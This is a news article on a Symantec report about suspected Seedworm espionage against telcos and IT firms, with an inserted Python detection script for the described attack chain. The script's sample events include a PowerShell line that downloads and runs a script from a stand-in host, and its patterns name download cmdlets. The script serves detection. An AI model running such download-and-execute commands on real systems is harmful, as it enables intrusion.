‘Seedworm’ Attackers Target Telcos in Asia, Middle East

The focused attacks aimed at cyberespionage and lateral movement appear to hint at further ambitions by the group, including supply-chain threats.

Attackers targeting telcos across the Middle East and Asia for the past six months are linked to Iranian state-sponsored hackers, according to researchers. The cyberespionage campaigns use a potent cocktail of spear phishing, known malware and legitimate network utilities to steal data and potentially disrupt supply chains.

Researchers outlined their findings on Tuesday in a report that says attacks are targeting a number of IT services organizations and a utility company. Although the initial attack vector is as yet unclear, threat actors appear to gain entry to networks using spear-phishing and then steal credentials to move laterally, according to the report published by Symantec Threat Hunter Team, a division of Broadcom.

“Organizations in Israel, Jordan, Kuwait, Saudi Arabia, the United Arab Emirates, Pakistan, Thailand and Laos were targeted in the campaign, which appears to have made no use of custom malware and instead relied on a mixture of legitimate tools, publicly available malware, and living-off-the-land tactics,” researchers wrote in the report.

Though the identity of the attackers is also unconfirmed, they potentially could be linked to the Iranian group Seedworm, aka MuddyWater or TEMP.Zagros, researchers said. This group has in the past engaged in widespread phishing campaigns against organizations in Asia and the Middle East in a mission to steal credentials and gain persistence in the target’s networks.

Specifically, researchers identified two IP addresses used in the campaign that were previously linked to Seedworm activity, as well as some overlap in tools—in particular SharpChisel and Password Dumper, they said.

While there has already been threat activity from Iran against telcos in the Middle East and Asia (the Iranian Chafer APT, for example, targeted a major Middle East telco in 2018), a Symantec spokesperson called the activity detailed in the report “a step up” in its focus and a potential harbinger of greater attacks to come.

Breaching Telcos

A typical attack in the latest campaign began with adversaries breaching a targeted network and then attempting to steal credentials to move laterally so that webshells can be deployed onto Exchange Servers, researchers said.

Researchers broke down a specific attack against a telecom company in the Middle East that began in August. In that instance, the first evidence of compromise was the creation of a service to launch an unknown Windows Script File (WSF), researchers said.

Attackers then used scripts to issue various domain, user discovery, and remote service discovery commands, and eventually used PowerShell to download and execute files and scripts. Attackers also deployed a remote access tool that appeared to query Exchange Servers of other organizations, researchers said.
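The sequence described above (a service launching a WSF file, scripted discovery, then PowerShell download and execute) can be checked as an ordered detection over Windows service-install and process-creation events. This is an added example, not code from the Symantec report; the event records, host names, and the discovery command names in the pattern are constructed assumptions.

```python
import re

# Constructed sample events, not taken from the report. Fields loosely follow
# Windows event 7045 (service installed) and 4688 (process creation).
EVENTS = [
    {"id": 7045, "host": "EXCH01", "cmd": r"cmd.exe /c wscript.exe C:\ProgramData\upd.wsf"},
    {"id": 7045, "host": "WS07", "cmd": r"C:\Program Files\Vendor\agent.exe"},
    {"id": 4688, "host": "EXCH01", "parent": "wscript.exe", "cmd": "net group /domain"},
    {"id": 4688, "host": "EXCH01", "parent": "wscript.exe", "cmd": "net user /domain"},
    {"id": 4688, "host": "EXCH01", "parent": "cmd.exe",
     "cmd": "powershell -c Invoke-WebRequest http://example.invalid/a.ps1 -OutFile a.ps1; .\\a.ps1"},
    {"id": 4688, "host": "WS07", "parent": "explorer.exe", "cmd": "powershell Get-ChildItem"},
]

# Stage order mirrors the chain described in the article. The command names in
# the discovery pattern are assumed examples; the report does not list them.
STAGES = [
    ("service_launches_wsf", 7045, re.compile(r"\.wsf\b", re.I)),
    ("scripted_discovery", 4688, re.compile(r"\b(net(1)?\s+(user|group|view)|nltest|whoami)\b", re.I)),
    ("powershell_download", 4688, re.compile(
        r"powershell.*(Invoke-WebRequest|DownloadString|DownloadFile|Start-BitsTransfer)", re.I)),
]
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

def classify(event):
    """Return the stage name an event matches, or None."""
    for name, event_id, pattern in STAGES:
        if event["id"] != event_id or not pattern.search(event["cmd"]):
            continue
        # Discovery only counts when spawned by a script host, to cut admin noise.
        if name == "scripted_discovery" and event.get("parent", "").lower() not in SCRIPT_HOSTS:
            continue
        return name
    return None

def hosts_with_full_chain(events):
    """Hosts where every stage appears in the article's order (events are time-sorted)."""
    progress = {}  # host -> index of the next stage still to be seen
    order = [name for name, _, _ in STAGES]
    for event in events:
        stage = classify(event)
        nxt = progress.get(event["host"], 0)
        if stage is not None and nxt < len(order) and stage == order[nxt]:
            progress[event["host"]] = nxt + 1
    return sorted(h for h, n in progress.items() if n == len(order))

if __name__ == "__main__":
    print(hosts_with_full_chain(EVENTS))
```

Requiring the stages in order on a single host keeps routine administrator use of `net` or PowerShell from alerting on its own.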

“One feature of this attack against a telecoms organization is that the attackers may have attempted to pivot to other targets by connecting to the Exchange Web Services (EWS) of other organizations, another telecoms operator and an electronic equipment company in the same region,” they wrote.

Supply-Chain Disruption?

Indeed, attackers appeared interested in using some compromised organizations as stepping stones, or solely as a way to reach organizations other than the initial victim and mount a supply-chain attack, researchers observed.

In one attack against a utility company in Laos that researchers called an “outlier,” the threat group appeared to exploit a public-facing service to gain initial entry, as the first compromised machine was an IIS web server, according to the report.

Attackers then used PowerShell to deliver malicious tools and scripts to the company’s network and ultimately to connect to a webmail server of an organization in Thailand as well as IT-related servers of another Thai company.

Despite this example, exactly how attackers are gaining initial entry into the majority of targeted networks remains a mystery; the only evidence of it was discovered at one compromised organization, researchers said.

“A suspected ScreenConnect setup MSI appeared to have been delivered in a zipped file named ‘Special discount program.zip,’ suggesting that it arrived in a spear-phishing email,” they wrote.
